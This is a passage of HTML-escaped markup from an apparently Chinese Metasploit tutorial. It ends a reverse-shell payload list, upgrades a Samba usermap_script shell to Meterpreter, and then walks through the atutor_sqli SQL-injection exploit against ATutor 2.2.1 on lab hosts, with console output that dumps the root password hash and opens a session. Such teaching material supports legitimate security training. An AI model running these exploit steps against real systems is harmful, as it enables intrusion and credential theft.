class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">31<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_ruby<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Ruby)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"39\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">32<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_ruby_ssl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">SSL<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Ruby)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"40\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">33<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_socat_udp<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">UDP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">socat)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"41\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">34<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_ssl_double_telnet<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Double<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">SSL<\/span> <span class=\"hljs-string\">(telnet)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"42\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">35<\/span> <span class=\"hljs-string\">cmd\/unix\/reverse_zsh<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Unix<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Zsh)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"43\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"44\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"45\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u6211\u4eec\u8fd8\u53ef\u4ee5\u901a\u8fc7<code>sessions -u [sessions_id]<\/code>\u00a0\u53ef\u4ee5\u5c06<code>shell<\/code>\u4f1a\u8bdd\u5347\u7ea7\u6210<code>meterpreter<\/code>\u4f1a\u8bdd\uff0c\u4ece\u800c\u53ef\u4ee5\u5229\u7528<code>meterpreter<\/code>\u7684\u9ad8\u7ea7\u529f\u80fd\u3002\u5173\u4e8e<code>meterpreter<\/code>\u4f1a\u5728\u540e\u7eed\u7684\u7ae0\u8282\u4e2d\u8be6\u7ec6\u8bb2\u89e3\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">sessions<\/span> <span class=\"hljs-string\">-u<\/span> <span class=\"hljs-number\">2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Executing<\/span> <span class=\"hljs-string\">'post\/multi\/manage\/shell_to_meterpreter'<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-string\">session(s):<\/span> [<span class=\"hljs-number\">2<\/span>]<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-attr\">Upgrading session ID:<\/span> <span class=\"hljs-number\">2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Starting<\/span> <span class=\"hljs-string\">exploit\/multi\/handler<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4433<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">stage<\/span> <span class=\"hljs-string\">(985320<\/span> <span class=\"hljs-string\">bytes)<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">3<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4433<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span><span class=\"hljs-string\">:35189)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-26 13:46:35<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-attr\">Command stager progress:<\/span> <span class=\"hljs-number\">100.00<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">(773\/773<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<h4 class=\"heading\">2\u3001SQL \u6ce8\u5165<\/h4>\n<p><code>Metasploit<\/code>\u6709\u51e0\u4e2a<code>SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\u7684\u5229\u7528\u6a21\u5757\uff0c\u4f7f\u6211\u4eec\u80fd\u591f\u6d4b\u8bd5\u548c\u9a8c\u8bc1\u76ee\u6807\u662f\u5426\u6613\u53d7\u653b\u51fb\u3002<\/p>\n<h5 class=\"heading\">\u51c6\u5907\u5de5\u4f5c<\/h5>\n<p>\u6211\u4eec\u5c06\u5b89\u88c5\u4e00\u4e2a\u6613\u53d7\u653b\u51fb\u7684\u5f00\u6e90<code>LMS\uff1aAtutor 2.2.1<\/code>\u8fdb\u884c\u6d4b\u8bd5\uff0c\u8bbf\u95ee<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/link.juejin.im\/?target=https%3A%2F%2Fwww.exploit-db.com%2Fexploits%2F39514\" rel=\"nofollow\">www.exploit-db.com\/exploits\/39\u2026<\/a>\u00a0\uff0c\u70b9\u51fb<code>VULNERABLE APP<\/code>\u65c1\u8fb9\u7684\u4e0b\u8f7d\u6309\u94ae\u5f00\u6e90\u4e0b\u8f7d<code>Atutor 2.2.1<\/code>\u3002<\/p>\n<figure><figcaption><\/figcaption><\/figure>\n<p>TIP\uff1a\u81f3\u4e8e\u600e\u4e48\u5b89\u88c5\u00a0<code>ATutor<\/code>\uff0c\u53ef\u4ee5\u67e5\u770b\u5b98\u65b9\u6587\u6863\u3002<\/p>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>\u8be5\u6a21\u5757\u5229\u7528\u4e86<code>ATutor 2.2.1<\/code>\u7684<code>SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\u548c\u8eab\u4efd\u9a8c\u8bc1\u6f0f\u6d1e\uff0c\u8fd9\u610f\u5473\u7740\u6211\u4eec\u53ef\u4ee5\u7ed5\u8fc7\u8eab\u4efd\u9a8c\u8bc1\uff0c\u8bbf\u95ee\u7ba1\u7406\u63a5\u53e3\uff0c\u4e0a\u4f20\u6076\u610f\u4ee3\u7801\u3002<\/p>\n<p>1\u3001\u4f7f\u7528<code>exploit\/multi\/http\/atutor_sqli<\/code>\u6a21\u5757\uff0c\u67e5\u770b\u6a21\u5757\u9009\u9879<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">use<\/span> <span class=\"hljs-string\">exploit\/multi\/http\/atutor_sqli<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">show<\/span> <span class=\"hljs-string\">options<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Module<\/span> <span class=\"hljs-string\">options<\/span> <span class=\"hljs-string\">(exploit\/multi\/http\/atutor_sqli):<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Name<\/span> <span class=\"hljs-string\">Current<\/span> <span class=\"hljs-string\">Setting<\/span> <span class=\"hljs-string\">Required<\/span> <span class=\"hljs-string\">Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">---------------<\/span> <span class=\"hljs-string\">--------<\/span> <span class=\"hljs-string\">-----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Proxies<\/span> <span class=\"hljs-literal\">no<\/span> <span class=\"hljs-string\">A<\/span> <span class=\"hljs-string\">proxy<\/span> <span class=\"hljs-string\">chain<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">format<\/span> <span class=\"hljs-string\">type:host:port[,type:host:port][...]<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-literal\">yes<\/span> <span class=\"hljs-string\">The<\/span> <span class=\"hljs-string\">target<\/span> <span class=\"hljs-string\">address<\/span> <span class=\"hljs-string\">range<\/span> <span class=\"hljs-string\">or<\/span> <span class=\"hljs-string\">CIDR<\/span> <span class=\"hljs-string\">identifier<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RPORT<\/span> <span class=\"hljs-number\">80<\/span> <span class=\"hljs-literal\">yes<\/span> <span class=\"hljs-string\">The<\/span> <span class=\"hljs-string\">target<\/span> <span class=\"hljs-string\">port<\/span> <span class=\"hljs-string\">(TCP)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">SSL<\/span> <span class=\"hljs-literal\">false<\/span> <span class=\"hljs-literal\">no<\/span> <span class=\"hljs-string\">Negotiate<\/span> <span class=\"hljs-string\">SSL\/TLS<\/span> <span class=\"hljs-string\">for<\/span> <span class=\"hljs-string\">outgoing<\/span> <span class=\"hljs-string\">connections<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">TARGETURI<\/span> <span class=\"hljs-string\">\/ATutor\/<\/span> <span class=\"hljs-literal\">yes<\/span> <span class=\"hljs-string\">The<\/span> <span class=\"hljs-string\">path<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">Atutor<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">VHOST<\/span> <span class=\"hljs-literal\">no<\/span> <span class=\"hljs-string\">HTTP<\/span> <span class=\"hljs-string\">server<\/span> <span class=\"hljs-string\">virtual<\/span> <span class=\"hljs-string\">host<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Exploit target:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Id<\/span> <span class=\"hljs-string\">Name<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">--<\/span> <span class=\"hljs-string\">----<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">0<\/span> <span class=\"hljs-string\">Automatic<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>2\u3001\u653b\u51fb\u4e4b\u524d\uff0c\u53ef\u4ee5\u901a\u8fc7<code>check<\/code>\u547d\u4ee4\u68c0\u6d4b\u76ee\u6807\u662f\u5426\u6613\u53d7\u653b\u51fb\u3002\u7136\u540e\u8fdb\u884c\u653b\u51fb<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">check<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><span class=\"hljs-string\">:80<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">The<\/span> <span class=\"hljs-string\">target<\/span> <span class=\"hljs-string\">is<\/span> <span class=\"hljs-string\">vulnerable.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5 exploit(multi\/http\/atutor_sqli) &gt; exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><span class=\"hljs-string\">:80<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Dumping<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">username<\/span> <span class=\"hljs-string\">and<\/span> <span class=\"hljs-string\">password<\/span> <span class=\"hljs-string\">hash...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><span class=\"hljs-string\">:80<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Dumping<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">username<\/span> <span class=\"hljs-string\">and<\/span> <span class=\"hljs-string\">password<\/span> <span class=\"hljs-string\">hash...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><span class=\"hljs-string\">:80<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Got<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">root's<\/span> <span class=\"hljs-attr\">hash:<\/span> <span class=\"hljs-string\">9c352326223a09bc610ff4919e611bed3fbb28f5<\/span> <span class=\"hljs-string\">!<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">stage<\/span> <span class=\"hljs-string\">(38247<\/span> <span class=\"hljs-string\">bytes)<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">13<\/span> <span 